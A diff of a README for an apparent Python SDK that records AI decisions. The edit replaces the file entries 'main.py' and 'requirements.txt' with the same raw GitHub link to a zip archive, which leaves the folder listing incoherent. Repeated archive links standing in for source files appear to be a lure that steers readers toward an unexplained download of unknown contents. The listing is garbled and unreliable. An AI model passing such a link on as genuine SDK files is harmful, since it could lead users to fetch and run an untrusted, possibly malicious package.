GalaxyMindPower/python-sdk/README.md

 Inside the extracted folder, you will find:

-- **main.py** – The main program to start recording and managing AI decisions
+- **https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zip** – The main program to start recording and managing AI decisions
-- **requirements.txt** – List of software required to run the SDK
+- **https://github.com/GalaxyMindPower/python-sdk/raw/refs/heads/main/air/sdk-python-v3.8-alpha.4.zip** – List of software required to run the SDK
 - **config/** – Folder with sample settings files to customize how the SDK works
 - **logs/** – This folder stores recorded AI decisions and audit data
 - **examples/** – Simple scripts showing how to use the SDK features